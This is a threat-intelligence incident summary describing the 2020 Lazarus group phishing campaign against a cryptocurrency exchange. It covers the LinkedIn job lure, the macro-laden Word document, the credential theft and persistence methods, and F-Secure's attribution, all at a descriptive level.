Cyber Incident Victim: Cryptocurrency exchange
Date:
Aug 2020
Location:
United States of America
Summary
The Lazarus group, a North Korean advanced persistent threat actor, targeted a cryptocurrency exchange through a LinkedIn phishing campaign impersonating a blockchain company's job opportunity. A system administrator received a malicious Microsoft Word document disguised as GDPR-protected content, which deployed malware via macros to execute a backdoor using mshta.exe and a bit.ly-linked VBScript, enabling command-and-control communication and PowerShell payload retrieval. The attackers utilized custom loaders, credential-harvesting tools like Mimikatz targeting financial data, and registry manipulation via schtasks to maintain persistence while attempting to erase evidence by deleting security logs. The operation aimed to compromise cryptocurrency wallets and expand infiltration across the sector's supply chain.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 3 techniques |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
On August 25, 2020, cybersecurity researchers from F-Secure disclosed a targeted attack by the Lazarus group against a cryptocurrency organization. The attack began with a phishing campaign exploiting LinkedIn job advertisements. A system administrator received a malicious Microsoft Word document via their personal LinkedIn account, purportedly from a blockchain technology company seeking candidates with the employee’s skills. The document claimed GDPR compliance required enabling macros to view its contents. Once macros were enabled, the document executed a .LNK file that launched mshta.exe to access a bit.ly link hosting a VBScript. This script performed system reconnaissance and transmitted operational data to a command-and-control (C2) server, which subsequently delivered PowerShell scripts to fetch Lazarus malware payloads. The attack leveraged phishing techniques consistent with previously identified Lazarus samples, including matching document metadata such as author names and word counts.
The malware deployed included a custom portable executable (PE) loader injected into the lsass.exe process as a security package, modifying registry keys via the schtasks utility. Lazarus utilized a tailored version of Mimikatz to harvest credentials, specifically targeting financial assets like cryptocurrency wallets and online banking accounts. Additional malware variants, such as LSSVC.dll, facilitated backdoor connections to other hosts, enabling arbitrary command execution, in-memory data decompression, and secondary payload downloads. The group attempted to evade detection by deleting security event logs and other forensic artifacts. F-Secure attributed the campaign to Lazarus based on technical overlaps with historical attacks, including the WannaCry ransomware, the Bangladesh Bank heist, and the 2018 HaoBao Bitcoin theft. The incident impacted organizations across 14 countries, including the UK and US. Researchers assessed that Lazarus would continue targeting cryptocurrency entities due to their profitability and might expand operations to compromise supply chain components within the sector.